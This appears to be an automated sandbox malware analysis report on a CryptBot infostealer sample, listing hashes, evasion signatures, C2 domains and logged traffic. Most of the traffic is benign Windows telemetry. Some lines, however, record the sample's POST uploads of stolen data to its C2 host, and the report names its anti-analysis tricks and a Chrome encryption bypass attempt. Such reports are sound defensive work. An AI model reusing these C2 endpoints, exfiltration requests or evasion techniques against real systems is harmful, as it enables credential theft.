Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561927
MD5: 313afbb9950c27be690ce768d37ddb0c
SHA1: a780ef02e5f96460ad7b8a98bcc7ae6ab1f607fa
SHA256: 8a9db782564f0af4f45ce9829e0b2f10024102c13fa28920fce2186f849edf76
Tags: exe, user-Bitsight

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: file.exe Avira: detected
Source: .1.1home.fvtekk5pn.top Avira URL Cloud: Label: malware
Source: file.exe.6456.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["CgPhome.fvtekk5pn.top", ".1.1home.fvtekk5pn.top", "kk5pfvtekk5pn.top", "CgPfvtekk5pn.top", "llowfvtekk5pn.top", "topekk5pn.top", "home.fvtekk5pn.top", "analforeverlovyu.top", "fvtekk5pn.top"]}
Source: file.exe ReversingLabs: Detection: 36%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: file.exe, 00000000.00000003.1680186508.0000000007242000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_47b82c6a-6
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49747 -> 34.116.198.130:80
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 465Content-Type: multipart/form-data; boundary=------------------------EyiO18jXLMfoFtYCQ6FcHF
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 89375Content-Type: multipart/form-data; boundary=------------------------HSiptiUlHgU1PEFcSsEDAr
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DtZnHvYBpgXM1dv&MD=NSnKede7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DtZnHvYBpgXM1dv&MD=NSnKede7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.x7CxCIZpks8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAg/rs=AHpOoo8czmnaLIncRgBQP7N2THncpDJ9mQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
